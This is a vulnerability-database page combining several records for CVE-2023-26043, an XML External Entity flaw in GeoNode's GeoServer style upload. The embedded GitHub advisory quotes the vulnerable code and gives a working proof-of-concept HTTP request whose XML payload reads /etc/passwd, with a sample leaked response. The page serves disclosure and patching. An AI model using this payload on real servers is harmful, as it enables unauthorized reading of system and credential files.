cvelistv5 - cve-2023-26043

CVE-2023-26043 (GCVE-0-2023-26043)

Vulnerability from cvelistv5 – Published: 2023-02-27 20:37 – Updated: 2025-03-10 18:53

Summary

GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-611 - Improper Restriction of XML External Entity Reference

Assigner

GitHub_M

References

URL

Tags

	https://github.com/GeoNode/geonode/security/advis…	x_refsource_CONFIRM
	https://github.com/GeoNode/geonode/commit/2fdfe91…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	GeoNode	geonode	Affected: < 4.0.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T11:39:06.288Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
          },
          {
            "name": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-26043",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-03-10T18:53:38.251323Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-10T18:53:48.331Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "geonode",
          "vendor": "GeoNode",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.0.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-611",
              "description": "CWE-611: Improper Restriction of XML External Entity Reference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-02-27T20:37:28.684Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
        },
        {
          "name": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
        }
      ],
      "source": {
        "advisory": "GHSA-mcmc-c59m-pqq8",
        "discovery": "UNKNOWN"
      },
      "title": "XML External Entity (XXE) injection in GeoServer style upload functionality"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-26043",
    "datePublished": "2023-02-27T20:37:28.684Z",
    "dateReserved": "2023-02-17T22:44:03.149Z",
    "dateUpdated": "2025-03-10T18:53:48.331Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:geosolutionsgroup:geonode:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"4.0.3\", \"matchCriteriaId\": \"FF65F806-F0DC-43AE-BA82-D15F8BB2F5B8\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.\\n\"}]",
      "id": "CVE-2023-26043",
      "lastModified": "2024-11-21T07:50:38.857",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\", \"baseScore\": 6.5, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 3.6}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\", \"baseScore\": 6.5, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 3.6}]}",
      "published": "2023-02-27T21:15:12.103",
      "references": "[{\"url\": \"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-611\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-611\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-26043\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-02-27T21:15:12.103\",\"lastModified\":\"2024-11-21T07:50:38.857\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.\\n\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-611\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-611\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:geosolutionsgroup:geonode:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.0.3\",\"matchCriteriaId\":\"FF65F806-F0DC-43AE-BA82-D15F8BB2F5B8\"}]}]}],\"references\":[{\"url\":\"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\", \"name\": \"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\", \"name\": \"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T11:39:06.288Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-26043\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-10T18:53:38.251323Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-10T18:53:43.983Z\"}}], \"cna\": {\"title\": \"XML External Entity (XXE) injection in GeoServer style upload functionality\", \"source\": {\"advisory\": \"GHSA-mcmc-c59m-pqq8\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"GeoNode\", \"product\": \"geonode\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.0.3\"}]}], \"references\": [{\"url\": \"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\", \"name\": \"https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\", \"name\": \"https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.\\n\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-611\", \"description\": \"CWE-611: Improper Restriction of XML External Entity Reference\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-02-27T20:37:28.684Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-26043\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-10T18:53:48.331Z\", \"dateReserved\": \"2023-02-17T22:44:03.149Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-02-27T20:37:28.684Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-MCMC-C59M-PQQ8

Vulnerability from github – Published: 2024-08-30 18:50 – Updated: 2024-11-18 16:27

Summary

GeoServer style upload functionality vulnerable to XML External Entity (XXE) injection

Details

Summary

GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.

Details

GeoNode's GeoServer has the ability to upload new styles for datasets through the dataset_style_upload view.

# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159
@login_required
def dataset_style_upload(request, layername):
    def respond(*args, **kw):
        kw['content_type'] = 'text/html'
        return json_response(*args, **kw)
    ...
    sld = request.FILES['sld'].read() # 1
    sld_name = None
    try:
        # Check SLD is valid
        ...
        sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES['sld']) # 2
    except Exception as e:
        respond(errors=f"The uploaded SLD file is not valid XML: {e}")
    name = data.get('name') or sld_name
    set_dataset_style(layer, data.get('title') or name, sld)
    return respond(
        body={
            'success': True,
            'style': data.get('title') or name, # 3
            'updated': data['update']})

dataset_style_upload gets a user-provided file (1), pass it to extract_name_from_sld to extract an element from it (2) and return the former in the response (3).

# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234
def extract_name_from_sld(gs_catalog, sld, sld_file=None):
    try:
        if sld:
            if isfile(sld):
                with open(sld, "rb") as sld_file:
                    sld = sld_file.read() # 1
            if isinstance(sld, str):
                sld = sld.encode('utf-8')
            dom = etree.XML(sld) # 2
        ...
    named_dataset = dom.findall(
        "{http://www.opengis.net/sld}NamedLayer")
    el = None
    if named_dataset and len(named_dataset) > 0:
        user_style = named_dataset[0].findall("{http://www.opengis.net/sld}UserStyle")
        if user_style and len(user_style) > 0:
            el = user_style[0].findall("{http://www.opengis.net/sld}Name") # 3
    ...
    return el[0].text # 4

extract_name_from_sld uses sld (which is a path to the provided file), reads it (1) and parses it with etree.XML in 2. Since the former uses a default XMLParser, the parsing gets done with the resolve_entities flag set to True. Therefore, dom handles the parsed XML containing the resolved entity (2), gets NamedLayer.UserStyle.Name in 3 and returns the resolved content in 4.

PoC

Create a guest/non-privileged account and log in.
Upload a dataset through /catalogue/#/upload/dataset whose name we will be referencing as <DATASET_NAME>.
Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of /etc/passwd:

POST /gs/geonode:<DATASET_NAME>/style/upload HTTP/1.1
Host: localhost
Cookie: django_language=en-us; csrftoken=<CSRF-TOKEN>; sessionid=<SESSION-COOKIE>
X-Csrftoken: <CSRF-TOKEN>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo
Content-Length: 485
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="layerid"
1
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="sld"; filename="foo.sld"
Content-Type: application/octet-stream
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY ent SYSTEM "/etc/passwd" > ]>
<foo xmlns="http://www.opengis.net/sld">
  <NamedLayer>
    <UserStyle>
        <Name>&ent;</Name>
    </UserStyle>
  </NamedLayer>
</foo>
------WebKitFormBoundaryfoo--

Sample response:

HTTP/1.1 200 OK
Server: nginx/1.23.2
...
{"success": true, "style": "root:x:0:0:root:/root:/bin/bash...", "updated": false}

Impact

This issue may lead to authenticated Arbitrary File Read.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

7.1 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "GeoNode"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26043"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-30T18:50:00Z",
    "nvd_published_at": "2023-02-27T21:15:12Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nGeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.\n\n### Details\nGeoNode\u0027s GeoServer has the ability to upload new styles for datasets through the [`dataset_style_upload` view](https://github.com/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/urls.py#L70-L72).\n\n```py\n# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159\n@login_required\ndef dataset_style_upload(request, layername):\n    def respond(*args, **kw):\n        kw[\u0027content_type\u0027] = \u0027text/html\u0027\n        return json_response(*args, **kw)\n    ...\n    sld = request.FILES[\u0027sld\u0027].read() # 1\n    sld_name = None\n    try:\n        # Check SLD is valid\n        ...\n        sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES[\u0027sld\u0027]) # 2\n    except Exception as e:\n        respond(errors=f\"The uploaded SLD file is not valid XML: {e}\")\n    name = data.get(\u0027name\u0027) or sld_name\n    set_dataset_style(layer, data.get(\u0027title\u0027) or name, sld)\n    return respond(\n        body={\n            \u0027success\u0027: True,\n            \u0027style\u0027: data.get(\u0027title\u0027) or name, # 3\n            \u0027updated\u0027: data[\u0027update\u0027]})\n```\n\n`dataset_style_upload` gets a user-provided file (`1`), pass it to `extract_name_from_sld` to extract an element from it (`2`) and return the former in the response (`3`).\n\n```py\n# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234\ndef extract_name_from_sld(gs_catalog, sld, sld_file=None):\n    try:\n        if sld:\n            if isfile(sld):\n                with open(sld, \"rb\") as sld_file:\n                    sld = sld_file.read() # 1\n            if isinstance(sld, str):\n                sld = sld.encode(\u0027utf-8\u0027)\n            dom = etree.XML(sld) # 2\n        ...\n    named_dataset = dom.findall(\n        \"{http://www.opengis.net/sld}NamedLayer\")\n    el = None\n    if named_dataset and len(named_dataset) \u003e 0:\n        user_style = named_dataset[0].findall(\"{http://www.opengis.net/sld}UserStyle\")\n        if user_style and len(user_style) \u003e 0:\n            el = user_style[0].findall(\"{http://www.opengis.net/sld}Name\") # 3\n    ...\n    return el[0].text # 4\n```\n\n`extract_name_from_sld` uses `sld` (which is a path to the provided file), reads it (`1`) and parses it with [`etree.XML`](https://github.com/python/cpython/blob/22d91c16bb03c3d87f53b5fee10325b876262a78/Lib/xml/etree/ElementTree.py#L1312) in `2`. Since the former uses a [default XMLParser](https://github.com/python/cpython/blob/22d91c16bb03c3d87f53b5fee10325b876262a78/Lib/xml/etree/ElementTree.py#L1323-L1324), the parsing gets done with the [`resolve_entities` flag set to `True`](https://lxml.de/api/lxml.etree.XMLParser-class.html#:~:text=resolve_entities%3DTrue). Therefore, `dom` handles the parsed XML containing the resolved entity (`2`), gets `NamedLayer.UserStyle.Name` in `3` and returns the resolved content in `4`.\n\n### PoC\n1. Create a guest/non-privileged account and log in.\n1. Upload a dataset through `/catalogue/#/upload/dataset` whose name we will be referencing as `\u003cDATASET_NAME\u003e`.\n1. Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of `/etc/passwd`:\n\n```\nPOST /gs/geonode:\u003cDATASET_NAME\u003e/style/upload HTTP/1.1\nHost: localhost\nCookie: django_language=en-us; csrftoken=\u003cCSRF-TOKEN\u003e; sessionid=\u003cSESSION-COOKIE\u003e\nX-Csrftoken: \u003cCSRF-TOKEN\u003e\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo\nContent-Length: 485\n------WebKitFormBoundaryfoo\nContent-Disposition: form-data; name=\"layerid\"\n1\n------WebKitFormBoundaryfoo\nContent-Disposition: form-data; name=\"sld\"; filename=\"foo.sld\"\nContent-Type: application/octet-stream\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n\u003c!DOCTYPE foo [ \u003c!ENTITY ent SYSTEM \"/etc/passwd\" \u003e ]\u003e\n\u003cfoo xmlns=\"http://www.opengis.net/sld\"\u003e\n  \u003cNamedLayer\u003e\n    \u003cUserStyle\u003e\n    \t\u003cName\u003e\u0026ent;\u003c/Name\u003e\n    \u003c/UserStyle\u003e\n  \u003c/NamedLayer\u003e\n\u003c/foo\u003e\n------WebKitFormBoundaryfoo--\n```\n\nSample response:\n\n```\nHTTP/1.1 200 OK\nServer: nginx/1.23.2\n...\n{\"success\": true, \"style\": \"root:x:0:0:root:/root:/bin/bash...\", \"updated\": false}\n```\n\n\n### Impact\nThis issue may lead to authenticated `Arbitrary File Read`.\n",
  "id": "GHSA-mcmc-c59m-pqq8",
  "modified": "2024-11-18T16:27:08Z",
  "published": "2024-08-30T18:50:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26043"
    },
    {
      "type": "WEB",
      "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/GeoNode/geonode"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/geonode/PYSEC-2023-15.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "GeoServer style upload functionality vulnerable to XML External Entity (XXE) injection"
}

GSD-2023-26043

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2023-26043

Aliases

CVE-2023-26043

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-26043",
    "id": "GSD-2023-26043"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-26043"
      ],
      "details": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.",
      "id": "GSD-2023-26043",
      "modified": "2023-12-13T01:20:53.792271Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-26043",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "geonode",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 4.0.3"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "GeoNode"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-611",
                "lang": "eng",
                "value": "CWE-611: Improper Restriction of XML External Entity Reference"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8",
            "refsource": "MISC",
            "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
          },
          {
            "name": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0",
            "refsource": "MISC",
            "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-mcmc-c59m-pqq8",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c4.0.3",
          "affected_versions": "All versions before 4.0.3",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "cwe_ids": [
            "CWE-1035",
            "CWE-611",
            "CWE-937"
          ],
          "date": "2023-06-01",
          "description": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.",
          "fixed_versions": [],
          "identifier": "CVE-2023-26043",
          "identifiers": [
            "CVE-2023-26043",
            "GHSA-mcmc-c59m-pqq8"
          ],
          "not_impacted": "",
          "package_slug": "npm/geonode",
          "pubdate": "2023-02-27",
          "solution": "Unfortunately, there is no solution available yet.",
          "title": "Improper Restriction of XML External Entity Reference",
          "urls": [
            "https://nvd.nist.gov/vuln/detail/CVE-2023-26043",
            "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0",
            "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
          ],
          "uuid": "2d213803-ab58-45d1-badb-77e5b0427f06"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
